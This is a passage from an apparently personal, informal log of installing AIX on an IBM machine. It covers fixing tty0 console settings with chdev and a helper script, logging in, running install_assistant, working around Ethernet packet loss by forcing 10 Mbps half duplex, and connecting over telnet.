13) as I said – go back to 10 :)

14) TERM=vt100 smitty chdev seems not to remember the RUNTIME & LOGIN console parameters even without making them instant (just saving them in the ODM). Maybe it is altering the CD's ODM instead?

15) go back to 10

16) it seems that the solution is to put in place a little script (I've called it /doit.sh – remember to make it executable with chmod +x!!) with the persistent (-P) option to chdev for tty0 (adding clocal to the RUNTIME & LOGIN tty0 settings; I've also put a chdev line there to enable login on this damn tty0 console). I've also set a root password just in case (I don't know if this is necessary).

17) sync; sync; sync; reboot (this time testing the real install from the SCSI disk)

18) GREAT! I CAN LOGIN!

19) # install_assistant – a piece of cake, even though this is my first install...

20) everything would be great if my 100 Mbps IBM PCI Ethernet card (the internal one; this box has two of them) weren't dropping 30-60% of packets. It seems it has auto-negotiated 100 Mbps FDX (info from the switch, smitty, lsattr, ...).

21) Having fun: altering the TRANSMIT/RECEIVE HW queues on ent0... nothing changes (same drops with ping -i 0.1 from a Linux box)

22) Temporary solution: forcing ent0 to 10 Mbps HD.

23) Ha! Now I can telnet in without problems (without "connection reset by peer" type errors)
Screenshot from AIX (after telnetting in)

24) Move this loud box away from in front of me to its own place: TO DEXTER'S LABORATORY ( => the basement ). Now, much better... I hate the sound of SCSI drives :/